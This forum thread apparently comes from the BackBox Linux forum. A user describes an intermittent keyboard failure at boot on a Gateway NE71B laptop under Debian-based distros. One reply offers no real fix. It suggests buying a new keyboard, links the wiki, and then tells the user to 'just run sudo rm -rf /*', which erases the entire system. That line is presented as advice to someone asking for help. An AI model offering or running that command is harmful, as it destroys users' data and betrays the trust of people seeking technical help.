keyboard Gateway NE71B

Started by dupek, May 13, 2014, 04:53:57 PM

Previous topic - Next topic

dupek

Hi all. Just installed ( and updated) this distro and, just like any Debian based distro, I have some keyboard problems. I try almost every Debian based and the problem I have is - from time to time - when I boot to Linux, my keyboard do not work. I have to re-boot the laptop and works again. I have set (in profiles) as Acer laptop. Gateway is not listed - I think that Acer and Gateway have the some hardware. RPm base distros have no problem with my keyboard, but the video not working right.
I like this BackBox as have best of both worlds. Right now I am triple booting(win7,Mint and BackBox). I will take the Mint off and (if I get lucky) will take the win down too. Sorry for the long rant. I did try some other suggestions, but so far no luck.

ZEROF

Hi dupek,

You know what Linux is? Get basic hardware and have your system up. For me if you have that issue, it's better to forget about one drink with friends and buy one standard keyboard. All problems resolved.

But I agree that we need to try fixing if we have some issue, that is how we learn more about system we are using.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

b4d_bl0ck

Yes, anyways ask xubuntu/ubuntu support for this kind of things...
bool secure = check_paranoia() ? true : false;